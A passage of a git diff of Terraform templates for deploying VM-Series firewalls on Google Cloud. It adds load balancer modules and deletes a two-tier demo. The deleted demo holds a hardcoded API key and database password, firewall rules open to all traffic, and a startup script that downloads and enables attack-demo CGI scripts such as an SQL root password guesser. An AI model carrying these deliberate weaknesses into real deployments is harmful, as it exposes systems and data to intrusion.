+ source = "${var.file_location}${element(var.content, count.index)}"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "license_full" {
+ count = "${(length(var.license) > 0 && var.enable_ilbnh) ? length(var.license) : "0" }"
+ name = "license/${element(var.license, count.index)}"
+ source = "${var.file_location}${element(var.license, count.index)}"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+resource "google_storage_bucket_object" "software_full" {
+ count = "${(length(var.software) > 0 && var.enable_ilbnh) ? length(var.software) : "0" }"
+ name = "software/${element(var.software, count.index)}"
+ source = "${var.file_location}${element(var.software, count.index)}"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+resource "google_storage_bucket_object" "config_empty" {
+ count = "${(length(var.config) == 0 && var.enable_ilbnh) ? 1 : 0 }"
+ name = "config/"
+ content = "config/"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+ count = "${(length(var.content) == 0 && var.enable_ilbnh) ? 1 : 0 }"
+ name = "content/"
+ content = "content/"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+ count = "${(length(var.license) == 0 && var.enable_ilbnh) ? 1 : 0 }"
+ name = "license/"
+ content = "license/"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+ count = "${(length(var.software) == 0 && var.enable_ilbnh) ? 1 : 0 }"
+ name = "software/"
+ content = "software/"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+
+resource "null_resource" "dependency_setter" {
+ depends_on = [
+ "google_storage_bucket.bootstrap",
+ "google_storage_bucket_object.config_full",
+ "google_storage_bucket_object.content_full",
+ "google_storage_bucket_object.license_full",
+ "google_storage_bucket_object.software_full",
+ "google_storage_bucket_object.config_empty",
+ "google_storage_bucket_object.content_empty",
+ "google_storage_bucket_object.license_empty",
+ "google_storage_bucket_object.software_empty",
+ ]
+}
+
+output "completion" {
+ value = "${null_resource.dependency_setter.id}"
+}
+
+output "bucket_name" {
+ value = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
diff --git a/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf
new file mode 100644
index 00000000..52e818e9
--- /dev/null
+++ b/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf
@@ -0,0 +1,51 @@
+variable enable_ilbnh {
+ default = false
+}
+variable "internal_lb_name_ilbnh" {
+ default = "ilbnh"
+}
+variable "internal_lb_ports_ilbnh" {
+ default = "22"
+}
+variable backends {
+ description = "Map backend indices to list of backend maps."
+ type = "list"
+}
+variable subnetworks {
+ type = "list"
+}
+variable "internal_lbnh_ip" {
+ default = ""
+}
+#************************************************************************************
+# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH
+#************************************************************************************
+resource "google_compute_health_check" "health_check_ilbnh" {
+ name = "${var.internal_lb_name_ilbnh}-check"
+ count = "${var.enable_ilbnh ? 1 : 0}"
+
+ tcp_health_check {
+ port = "${var.internal_lb_ports_ilbnh}"
+ }
+}
+
+resource "google_compute_region_backend_service" "backend_service_ilbnh" {
+ name = "${var.internal_lb_name_ilbnh}"
+ count = "${var.enable_ilbnh ? 1 : 0}"
+ health_checks = ["${google_compute_health_check.health_check_ilbnh.self_link}"]
+ backend = ["${var.backends}"]
+ session_affinity = "CLIENT_IP"
+
+}
+
+
+resource "google_compute_forwarding_rule" "forwarding_rule_ilbnh" {
+ name = "${var.internal_lb_name_ilbnh}-all"
+ count = "${var.enable_ilbnh ? 1 : 0}"
+ load_balancing_scheme = "INTERNAL"
+ ip_address = "${var.internal_lbnh_ip}"
+ ip_protocol = "TCP"
+ all_ports = true
+ subnetwork = "${var.subnetworks[0]}"
+ backend_service = "${google_compute_region_backend_service.backend_service_ilbnh.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf
new file mode 100644
index 00000000..dcfa2fae
--- /dev/null
+++ b/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf
@@ -0,0 +1,172 @@
+variable enable_ilbnh {
+ default = false
+}
+variable fw_subnetworks {
+ type = "list"
+}
+
+variable fw_names {
+ type = "list"
+}
+
+variable fw_machine_type {}
+
+variable fw_zones {
+ type = "list"
+}
+
+variable fw_cpu_platform {
+ default = "Intel Skylake"
+}
+
+variable fw_bootstrap_bucket {
+ default = ""
+}
+
+variable fw_ssh_key {}
+
+variable public_lb_create {
+ default = false
+}
+
+variable fw_scopes {
+ type = "list"
+
+ default = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable fw_image {}
+
+variable fw_tags {
+ type = "list"
+ default = []
+}
+
+variable create_instance_group {
+ default = false
+}
+
+variable instance_group_names {
+ type = "list"
+ default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+ type = "list"
+ default = []
+}
+
+variable fw_nic0_ip {
+ type = "list"
+ default = []
+}
+
+variable fw_nic1_ip {
+ type = "list"
+ default = []
+}
+
+variable fw_nic2_ip {
+ type = "list"
+ default = []
+}
+variable instance_group {
+ type = "list"
+ default = []
+}
+
+resource "null_resource" "dependency_getter" {
+ provisioner "local-exec" {
+ command = "echo ${length(var.dependencies)}"
+ }
+}
+
+#************************************************************************************
+# CREATE VMSERIES
+#***********************************************************************************
+resource "google_compute_instance" "vmseries" {
+ count = "${(length(var.fw_names) > 0 && var.enable_ilbnh) ? length(var.fw_names) : "0" }"
+ name = "${element(var.fw_names, count.index)}"
+ machine_type = "${var.fw_machine_type}"
+ zone = "${element(var.fw_zones, count.index)}"
+ min_cpu_platform = "${var.fw_cpu_platform}"
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ tags = "${var.fw_tags}"
+
+ metadata {
+ vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}"
+ serial-port-enable = true
+ sshKeys = "${var.fw_ssh_key}"
+ }
+
+ service_account {
+ scopes = "${var.fw_scopes}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[0]}"
+ network_ip = "${element(var.fw_nic0_ip, count.index)}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[1]}"
+ access_config = {}
+ network_ip = "${element(var.fw_nic1_ip, count.index)}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[2]}"
+ access_config = {}
+ network_ip = "${element(var.fw_nic2_ip, count.index)}"
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.fw_image}"
+ }
+ }
+
+ depends_on = [
+ "null_resource.dependency_getter",
+ ]
+}
+
+#************************************************************************************
+# CREATE INSTANCE GROUP
+#************************************************************************************
+resource "google_compute_instance_group" "vmseries" {
+ count = "${(var.create_instance_group && var.enable_ilbnh) ? length(var.fw_names) : 0}"
+ name = "${element(var.instance_group_names, count.index)}"
+ zone = "${element(var.fw_zones, count.index)}"
+ instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"]
+}
+
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+
+output "fw_names" {
+ value = "${google_compute_instance.vmseries.*.name}"
+}
+
+output "fw_self_link" {
+ value = "${google_compute_instance.vmseries.*.self_link}"
+}
+
+output "instance_group" {
+ value = "${concat(google_compute_instance_group.vmseries.*.self_link, list(""), list(""))}"
+}
+
+output "fw_nic0_public_ip" {
+ value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "fw_nic1_public_ip" {
+ value = "${google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip}"
+}
diff --git a/gcp/gcp-terraform-mclimans/README.md b/gcp/gcp-terraform-mclimans/README.md
deleted file mode 100644
index 7b55a4f9..00000000
--- a/gcp/gcp-terraform-mclimans/README.md
+++ /dev/null
@@ -1 +0,0 @@
-GCP terraform builds by mmclimans@paloaltonetworks.com
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/README.md b/gcp/gcp-terraform-mclimans/demo_deployments/README.md
deleted file mode 100644
index 3993db83..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/README.md
+++ /dev/null
@@ -1 +0,0 @@
-Demo deployments for testing and demonstrations in isolated enviroments. Do not use in any production environments.
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub
deleted file mode 100644
index 14ab5c49..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub
+++ /dev/null
@@ -1 +0,0 @@
-REPLACE THIS FILE WITH YOUR PUBLIC KEY FOR SSH ACCESS TO BACKEND VMs
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json
deleted file mode 100644
index b3acf687..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json
+++ /dev/null
@@ -1,3 +0,0 @@
-{
- "comment": "REPLACE THIS FILE WITH YOUR GCE API KEY (JSON FORMAT)"
-}
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf
deleted file mode 100644
index 4a522608..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf
+++ /dev/null
@@ -1,355 +0,0 @@
-/*
-*************************************************************************************************************
-** **
-** author: mmclimans **
-** date: 4/1/19 **
-** contact: mmclimans@paloaltonetworks.com **
-** **
-** SUPPORT POLICY **
-** **
-** This build is released under an as-is, best effort, support policy. **
-** These scripts should be seen as community supported and Palo Alto Networks will contribute our **
-** expertise as and when possible. We do not provide technical support or help in using or **
-** troubleshooting the components of the project through our normal support options such as **
-** Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support **
-** options. The underlying product used (the VM-Series firewall) by the scripts or templates are still **
-** supported, but the support is only for the product functionality and not for help in deploying or **
-** using the template or script itself. Unless explicitly tagged, all projects or work posted in our **
-** GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads **
-** page on https://support.paloaltonetworks.com are provided under the best effort policy. **
-** **
-*************************************************************************************************************
-*/
-
-# SET AUTHENTICATION TO GCE API
-provider "google" {
- credentials = "${file(var.gcp_credentials_file)}"
- project = "${var.my_gcp_project}"
- region = "${var.region}"
-}
-
-############################################################################################
-############################################################################################
-# CREATE BUCKET & UPLOAD VMSERIES BOOTSTRAP FILES
-resource "google_storage_bucket" "bootstrap" {
- name = "${var.bootstrap_bucket}"
- force_destroy = true
-}
-resource "google_storage_bucket_object" "bootstrap_xml" {
- name = "config/bootstrap.xml"
- source = "bootstrap/bootstrap.xml"
- bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "init-cfg" {
- name = "config/init-cfg.txt"
- source = "bootstrap/init-cfg.txt"
- bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "content" {
- name = "content/panupv2-all-contents-8138-5378"
- source = "bootstrap/panupv2-all-contents-8138-5378"
- bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "software" {
- name = "software/"
- source = "/dev/null"
- bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "license" {
- name = "license/"
- source = "/dev/null"
- bucket = "${google_storage_bucket.bootstrap.name}"
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE VPCS AND SUBNETS
-resource "google_compute_network" "mgmt" {
- name = "${var.mgmt_vpc}"
- auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "mgmt_subnet" {
- name = "${var.mgmt_vpc_subnet}"
- ip_cidr_range = "${var.mgmt_vpc_subnet_cidr}"
- network = "${google_compute_network.mgmt.name}"
- region = "${var.region}"
-}
-resource "google_compute_network" "untrust" {
- name = "${var.untrust_vpc}"
- auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "untrust_subnet" {
- name = "${var.untrust_vpc_subnet}"
- ip_cidr_range = "${var.untrust_vpc_subnet_cidr}"
- network = "${google_compute_network.untrust.name}"
- region = "${var.region}"
-}
-resource "google_compute_network" "web" {
- name = "${var.web_vpc}"
- auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "web_subnet" {
- name = "${var.web_vpc_subnet}"
- ip_cidr_range = "${var.web_vpc_subnet_cidr}"
- network = "${google_compute_network.web.name}"
- region = "${var.region}"
-}
-resource "google_compute_network" "db" {
- name = "${var.db_vpc}"
- auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "db_subnet" {
- name = "${var.db_vpc_subnet}"
- ip_cidr_range = "${var.db_vpc_subnet_cidr}"
- network = "${google_compute_network.db.name}"
- region = "${var.region}"
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE GCP VPC ROUTES
-resource "google_compute_route" "web_vpc_route" {
- name = "web-vpc-route"
- dest_range = "0.0.0.0/0"
- network = "${google_compute_network.web.name}"
- next_hop_ip = "${var.fw_nic2_ip}"
- priority = 100
- depends_on = [
- "google_compute_instance.firewall",
- "google_compute_subnetwork.mgmt_subnet",
- "google_compute_subnetwork.untrust_subnet",
- "google_compute_subnetwork.web_subnet",
- "google_compute_subnetwork.db_subnet",
- ]
-}
-resource "google_compute_route" "db_vpc_route" {
- name = "db-vpc-route"
- dest_range = "0.0.0.0/0"
- network = "${google_compute_network.db.name}"
- next_hop_ip = "${var.fw_nic3_ip}"
- priority = 100
- depends_on = [
- "google_compute_instance.firewall",
- "google_compute_subnetwork.mgmt_subnet",
- "google_compute_subnetwork.untrust_subnet",
- "google_compute_subnetwork.web_subnet",
- "google_compute_subnetwork.db_subnet",
- ]
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE GCP VPC FIREWALL RULES
-resource "google_compute_firewall" "mgmt_vpc_ingress" {
- name = "mgmt-ingress"
- network = "${google_compute_network.mgmt.name}"
- direction = "INGRESS"
- source_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "icmp"
- }
- allow {
- protocol = "tcp"
- ports = ["443", "22", "3897"]
- }
-}
-resource "google_compute_firewall" "mgmt_vpc_egress" {
- name = "mgmt-vpc-egress"
- network = "${google_compute_network.mgmt.name}"
- direction = "EGRESS"
- destination_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "untrust_vpc_ingress" {
- name = "untrust-vpc-ingress"
- network = "${google_compute_network.untrust.name}"
- direction = "INGRESS"
- source_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "untrust_vpc_egress" {
- name = "untrust-vpc-egress"
- network = "${google_compute_network.untrust.name}"
- direction = "EGRESS"
- destination_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "web_vpc_ingress" {
- name = "web-vpc-ingress"
- network = "${google_compute_network.web.name}"
- direction = "INGRESS"
- source_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "web_vpc_egress" {
- name = "web-vpc-egress"
- network = "${google_compute_network.web.name}"
- direction = "EGRESS"
- destination_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "db_vpc_ingress" {
- name = "db-vpc-ingress"
- network = "${google_compute_network.db.name}"
- direction = "INGRESS"
- source_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "db_vpc_egress" {
- name = "db-vpc-egress"
- network = "${google_compute_network.db.name}"
- direction = "EGRESS"
- destination_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE VM-SERIES
-resource "google_compute_instance" "firewall" {
- name = "${var.fw_vm_name}"
- machine_type = "${var.fw_machine_type}"
- zone = "${var.zone}"
- min_cpu_platform = "${var.fw_machine_cpu}"
- can_ip_forward = true
- allow_stopping_for_update = true
- count = 1
-
- metadata {
- vmseries-bootstrap-gce-storagebucket = "${var.bootstrap_bucket}"
- serial-port-enable = true
- }
- service_account {
- scopes = "${var.fw_scopes}"
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.mgmt_subnet.name}"
- network_ip = "${var.fw_nic0_ip}"
- access_config = {}
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.untrust_subnet.name}"
- network_ip = "${var.fw_nic1_ip}"
- access_config = {}
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.web_subnet.name}"
- network_ip = "${var.fw_nic2_ip}"
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.db_subnet.name}"
- network_ip = "${var.fw_nic3_ip}"
- }
- boot_disk {
- initialize_params {
- image = "${var.fw_image}"
- }
- }
- depends_on = [
- "google_storage_bucket.bootstrap",
- "google_storage_bucket_object.bootstrap_xml",
- "google_storage_bucket_object.init-cfg",
- "google_storage_bucket_object.content",
- "google_storage_bucket_object.license",
- "google_storage_bucket_object.software",
- ]
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE DB SERVER
-resource "google_compute_instance" "dbserver" {
- name = "${var.db_vm_name}"
- machine_type = "${var.db_machine_type}"
- zone = "${var.zone}"
- can_ip_forward = true
- allow_stopping_for_update = true
- count = 1
- metadata_startup_script = "${file("${path.module}/scripts/dbserver-startup.sh")}"
- metadata {
- serial-port-enable = true
- sshKeys = "${var.gcp_ssh_user}:${file(var.gcp_key_file)}"
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.db_subnet.name}"
- network_ip = "${var.db_nic0_ip}"
- }
- service_account {
- scopes = "${var.vm_scopes}"
- }
- boot_disk {
- initialize_params {
- image = "${var.vm_image}"
- }
- }
- depends_on = [
- "google_compute_instance.firewall",
- "google_compute_subnetwork.mgmt_subnet",
- "google_compute_subnetwork.untrust_subnet",
- "google_compute_subnetwork.web_subnet",
- "google_compute_subnetwork.db_subnet",
- ]
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE WEB SERVER
-resource "google_compute_instance" "webserver" {
- name = "${var.web_vm_name}"
- machine_type = "${var.web_machine_type}"
- zone = "${var.zone}"
- can_ip_forward = true
- allow_stopping_for_update = true
- count = 1
- metadata_startup_script = "${file("${path.module}/scripts/webserver-startup.sh")}"
- metadata {
- serial-port-enable = true
- sshKeys = "${var.gcp_ssh_user}:${file(var.gcp_key_file)}"
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.web_subnet.name}"
- network_ip = "${var.web_nic0_ip}"
- }
- boot_disk {
- initialize_params {
- image = "${var.vm_image}"
- }
- }
- service_account {
- scopes = "${var.vm_scopes}"
- }
- depends_on = [
- "google_compute_instance.firewall",
- "google_compute_subnetwork.mgmt_subnet",
- "google_compute_subnetwork.untrust_subnet",
- "google_compute_subnetwork.web_subnet",
- "google_compute_subnetwork.db_subnet",
- ]
-}
-
-
-############################################################################################
-############################################################################################
-output "DEPLOYMENT STATUS" {
- value = "COMPLETE"
-}
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh
deleted file mode 100644
index f618cd97..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh
+++ /dev/null
@@ -1,24 +0,0 @@
-#!/bin/bash
-sudo exec > >(sudo tee /var/log/user-data.log|logger -t user-data -s 2> sudo /dev/console) 2>&1
-FW_NIC3="10.5.3.4"
-while true
- do
- resp=$(curl -s -S -g -k "https://$FW_NIC3/api/?type=op&cmd=&key=LUFRPT1CU0dMRHIrOWFET0JUNzNaTmRoYmkwdjBkWWM9alUvUjBFTTNEQm93Vmx0OVhFRlNkOXdJNmVwYWk5Zmw4bEs3NjgwMkh5QT0=")
- echo $resp
- if [[ $resp == *"[CDATA[yes"* ]] ; then
- break
- fi
- sleep 10s
- done
-sudo apt-get update
-sudo apt-get -y install debconf-utils
-sudo DEBIAN_FRONTEND=noninteractive | apt-get install -y mysql-server
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1')"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.user WHERE User=''"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_localhost';"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "FLUSH PRIVILEGES;"
-sudo sed -i "s/.*bind-address.*/bind-address = 0.0.0.0/" /etc/mysql/mysql.conf.d/mysqld.cnf
-sudo systemctl restart mysql && sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "CREATE DATABASE Demo;"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "CREATE USER 'demouser'@'%' IDENTIFIED BY 'paloalto@123';"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "GRANT ALL PRIVILEGES ON Demo.* TO 'demouser'@'%';"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "FLUSH PRIVILEGES;"
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh
deleted file mode 100644
index 02dd7129..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh
+++ /dev/null
@@ -1,42 +0,0 @@
-#! /bin/bash
-exec > >(tee /var/log/user-data.log|logger -t user-data -s 2>/dev/console) 2>&1
-dbip="10.5.3.5"
-FW_NIC2="10.5.2.4"
-while true
- do
- resp=$(curl -s -S -g -k "https://$FW_NIC2/api/?type=op&cmd=&key=LUFRPT1CU0dMRHIrOWFET0JUNzNaTmRoYmkwdjBkWWM9alUvUjBFTTNEQm93Vmx0OVhFRlNkOXdJNmVwYWk5Zmw4bEs3NjgwMkh5QT0=")
- echo $resp
- if [[ $resp == *"[CDATA[yes"* ]] ; then
- break
- fi
- sleep 10s
- done
-apt-get update
-apt-get install -y apache2 wordpress
-ln -sf /usr/share/wordpress /var/www/html/wordpress
-gzip -d /usr/share/doc/wordpress/examples/setup-mysql.gz
-while true; do
- resp=$(mysql -udemouser -ppaloalto@123 -h "$dbip" -e 'show databases')
- echo "$resp"
- if [[ "$resp" = *"Demo"* ]]
- then
- break
- fi
- sleep 5s
-done
-bash /usr/share/doc/wordpress/examples/setup-mysql -n Demo -t "$dbip" "$dbip"
-sed -i "s/define('DB_USER'.*/define('DB_USER', 'demouser');/g" /etc/wordpress/config-"$dbip".php
-sed -i "s/define('DB_PASSWORD'.*/define('DB_PASSWORD', 'paloalto@123');/g" /etc/wordpress/config-"$dbip".php
-wget -O /usr/lib/cgi-bin/guess-sql-root-password.cgi https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/guess-sql-root-password.cgi
-chmod +x /usr/lib/cgi-bin/guess-sql-root-password.cgi
-sed -i "s/DB-IP-ADDRESS/$dbip/g" /usr/lib/cgi-bin/guess-sql-root-password.cgi
-wget -O /usr/lib/cgi-bin/ssh-to-db.cgi https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/ssh-to-db.cgi
-chmod +x /usr/lib/cgi-bin/ssh-to-db.cgi
-sed -i "s/DB-IP-ADDRESS/$dbip/g" /usr/lib/cgi-bin/ssh-to-db.cgi
-wget -O /var/www/html/showheaders.php https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/showheaders.php
-wget -O /var/www/html/sql-attack.html https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/sql-attack.html
-ln -sf /etc/apache2/conf-available/serve-cgi-bin.conf /etc/apache2/conf-enabled/serve-cgi-bin.conf
-ln -sf /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load
-sudo ln -s /etc/wordpress/config-"$dbip".php /etc/wordpress/config-default.php
-systemctl restart apache2
-
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf
deleted file mode 100644
index bb6e19f0..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf
+++ /dev/null
@@ -1,176 +0,0 @@
-/*
-*************************************************************************************************************
-** **
-** author: mmclimans **
-** date: 4/1/19 **
-** contact: mmclimans@paloaltonetworks.com **
-** **
-** SUPPORT POLICY **
-** **
-** This build is released under an as-is, best effort, support policy. **
-** These scripts should be seen as community supported and Palo Alto Networks will contribute our **
-** expertise as and when possible. We do not provide technical support or help in using or **
-** troubleshooting the components of the project through our normal support options such as **
-** Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support **
-** options. The underlying product used (the VM-Series firewall) by the scripts or templates are still **
-** supported, but the support is only for the product functionality and not for help in deploying or **
-** using the template or script itself. Unless explicitly tagged, all projects or work posted in our **
-** GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads **
-** page on https://support.paloaltonetworks.com are provided under the best effort policy. **
-** **
-*************************************************************************************************************
-*/
-
-variable "my_gcp_project" {
- description = "Enter the Project ID of an existing GCP project:"
- # default = "my-gcp-project-0000001"
-}
-variable "gcp_credentials_file" {
- description = "Enter the JSON GCE API KEY for your environment (the json must exist in the main.tf directory)"
- # default = "gcp-credentials.json"
-}
-variable "bootstrap_bucket" {
- description = "Enter globally unique name for the new bootstrap bucket"
- # default = "vmseries-2tier-75834523984575432"
-}
-variable "gcp_key_file" {
- description = "Enter your public key (this is only required if you need to access the DB and WEB VMs):"
- # default = "gcloudkey.pub"
-}
-variable "gcp_ssh_user" {
- description = "Enter the username value associated with the GCP public key:"
- default = "ubuntu"
-}
-
-variable "fw_image" {
- # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-810"
- # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-810"
- default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814"
-}
-variable "region" {
- description = "Enter the region to deploy the build:"
- default = "us-east4"
-}
-variable "zone" {
- description = "Enter the region's zone:"
- default = "us-east4-a"
-}
-
-/*
-*************************************************************************************************************
-** **
-** THE VARIABLES BELOW DO NOT BE CHANGED TO RUN THE TWO-TIER DEMO!!! **
-** **
-*************************************************************************************************************
-*/
-
-#############################################################################################################
-# GCP VPC VARIABLES
-variable "mgmt_vpc" {
- default = "mgmt-vpc"
-}
-variable "mgmt_vpc_subnet" {
- default = "mgmt-subnet"
-}
-variable "mgmt_vpc_subnet_cidr" {
- default = "10.5.0.0/24"
-}
-variable "untrust_vpc" {
- default = "untrust-vpc"
-}
-variable "untrust_vpc_subnet" {
- default = "untrust-subnet"
-}
-variable "untrust_vpc_subnet_cidr" {
- default = "10.5.1.0/24"
-}
-variable "web_vpc" {
- default = "web-vpc"
-}
-variable "web_vpc_subnet" {
- default = "web-subnet"
-}
-variable "web_vpc_subnet_cidr" {
- default = "10.5.2.0/24"
-}
-variable "db_vpc" {
- default = "db-vpc"
-}
-variable "db_vpc_subnet" {
- default = "db-subnet"
-}
-variable "db_vpc_subnet_cidr" {
- default = "10.5.3.0/24"
-}
-################################################################################################################
-################################################################################################################
-# VM-SERIES VM VARIABLES
-variable "fw_vm_name" {
- default = "vmseries-vm"
-}
-variable "fw_machine_type" {
- default = "n1-standard-4"
-}
-variable "fw_machine_cpu" {
- default = "Intel Skylake"
-}
-variable "fw_nic0_ip" {
- default = "10.5.0.4"
-}
-variable "fw_nic1_ip" {
- default = "10.5.1.4"
-}
-variable "fw_nic2_ip" {
- default = "10.5.2.4"
-}
-variable "fw_nic3_ip" {
- default = "10.5.3.4"
-}
-################################################################################################################
-################################################################################################################
-# WEB-VM VARIABLES
-variable "web_vm_name" {
- default = "web-vm"
-}
-variable "web_machine_type" {
- default = "f1-micro"
-}
-variable "web_nic0_ip" {
- default = "10.5.2.5"
-}
-################################################################################################################
-################################################################################################################
-# DB-VM VARIABLES
-variable "db_vm_name" {
- default = "db-vm"
-}
-variable "db_machine_type" {
- default = "f1-micro"
-}
-variable "db_nic0_ip" {
- default = "10.5.3.5"
-}
-variable "vm_image" {
- default = "ubuntu-os-cloud/ubuntu-1804-lts"
-}
-################################################################################################################
-################################################################################################################
-variable "fw_scopes" {
- default = [
- "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
- "https://www.googleapis.com/auth/devstorage.read_only",
- "https://www.googleapis.com/auth/logging.write",
- "https://www.googleapis.com/auth/monitoring.write",
- ]
-}
-
-variable "vm_scopes" {
- default = ["https://www.googleapis.com/auth/cloud.useraccounts.readonly",
- "https://www.googleapis.com/auth/devstorage.read_only",
- "https://www.googleapis.com/auth/logging.write",
- "https://www.googleapis.com/auth/monitoring.write",
- "https://www.googleapis.com/auth/compute.readonly",
- ]
-}
-
-
diff --git a/gcp/ilbnh-mig/README.md b/gcp/ilbnh-mig/README.md
new file mode 100644
index 00000000..e617ff44
--- /dev/null
+++ b/gcp/ilbnh-mig/README.md
@@ -0,0 +1,76 @@
